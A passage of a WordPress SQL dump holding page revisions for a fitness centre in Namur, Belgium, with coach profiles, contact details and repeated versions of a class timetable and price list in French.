alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-10 15:47:02', '2013-07-10 15:47:02', '', 20, 'http://www.crosstrainingcenter.be/20-revision-36/', 0, 'revision', '', 0),
(337, 1, '2013-07-11 07:03:58', '2013-07-11 07:03:58', '<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de\r\nTeam Training, Duo Training, Personnal\r\nTraining ou Coaching nutritionnel se\r\nfont exclusivement par téléphone.\r\n\r\n0485 / 92 . 02 . 12\r\n<h1>&nbsp;</h1>\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em></td>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;source=embed\">Agrandir le plan</a></small></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-11 07:03:58', '2013-07-11 07:03:58', '', 9, 'http://www.crosstrainingcenter.be/9-revision-20/', 0, 'revision', '', 0),
(339, 1, '2013-07-25 16:36:46', '2013-07-25 16:36:46', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>&nbsp;</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>&nbsp;</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>&nbsp;</h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2>&nbsp;</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-25 16:36:46', '2013-07-25 16:36:46', '', 11, 'http://www.crosstrainingcenter.be/11-revision-114/', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(344, 1, '2013-08-23 08:46:17', '2013-08-23 08:46:17', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-08-23 08:46:17', '2013-08-23 08:46:17', '', 11, 'http://www.crosstrainingcenter.be/11-revision-115/', 0, 'revision', '', 0),
(346, 1, '2013-10-05 08:39:04', '2013-10-05 08:39:04', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n<br>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcellule\">18h<br>TRX</td>\r\n<td class=\"tcellule\">17h30<br>CARDIO</td>\r\n<td class=\"tcellule\">18h<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">17h30<br>GLFE</td>\r\n<td class=\"tcellule\">17h30<br>TRX</td>\r\n<td class=\"tcellule\">17h30<br>TRX</td>\r\n<td class=\"tcellule\">11h<br>GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcellule\">18h30<br>GLFE</td>\r\n<td class=\"tcellule\">18h15<br>TRX</td>\r\n<td class=\"tcellule\">18h30<br>CARDIO</td>\r\n<td class=\"tcellule\">18h15<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">18h15<br>GLFE</td>\r\n<td class=\"tcellule\">11h30<br>GLFE</td>\r\n<td class=\"tcellule\">11h30<br>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcellule\">19h<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">19h<br>GLFE</td>\r\n<td class=\"tcellule\">19h<br>TRX</td>\r\n<td class=\"tcellule\">19h<br>CARDIO</td>\r\n<td class=\"tcellule\">19h<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">12h<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">12h<br>CARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcellule\">19h45<br>CARDIO</td>\r\n<td class=\"tcellule\">19h30<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">19h45<br>GLFE</td>\r\n<td class=\"tcellule\">19h15<br>TRX</td>\r\n<td class=\"tcellule\">19h45<br>CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<br>\r\n\r\n\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-10-05 08:39:04', '2013-10-05 08:39:04', '', 11, 'http://www.crosstrainingcenter.be/11-revision-117/', 0, 'revision', '', 0),
(345, 1, '2013-10-05 08:37:45', '2013-10-05 08:37:45', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n<br>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcellule\">18h<br>TRX</td>\r\n<td class=\"tcellule\">17h30<br>CARDIO</td>\r\n<td class=\"tcellule\">18h<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">17h30<br>GLFE</td>\r\n<td class=\"tcellule\">17h30<br>TRX</td>\r\n<td class=\"tcellule\">17h30<br>TRX</td>\r\n<td class=\"tcellule\">11h<br>GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcellule\">18h30<br>GLFE</td>\r\n<td class=\"tcellule\">18h15<br>TRX</td>\r\n<td class=\"tcellule\">18h30<br>CARDIO</td>\r\n<td class=\"tcellule\">18h15<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">18h15<br>GLFE</td>\r\n<td class=\"tcellule\">11h30<br>GLFE</td>\r\n<td class=\"tcellule\">11h30<br>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcellule\">19h<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">19h<br>GLFE</td>\r\n<td class=\"tcellule\">19h<br>TRX</td>\r\n<td class=\"tcellule\">19h<br>CARDIO</td>\r\n<td class=\"tcellule\">19h<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">12h<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">12h<br>CARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcellule\">19h45<br>CARDIO</td>\r\n<td class=\"tcellule\">19h30<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">19h45<br>GLFE</td>\r\n<td class=\"tcellule\">19h15<br>TRX</td>\r\n<td class=\"tcellule\">19h45<br>CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<br>\r\n\r\n\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td 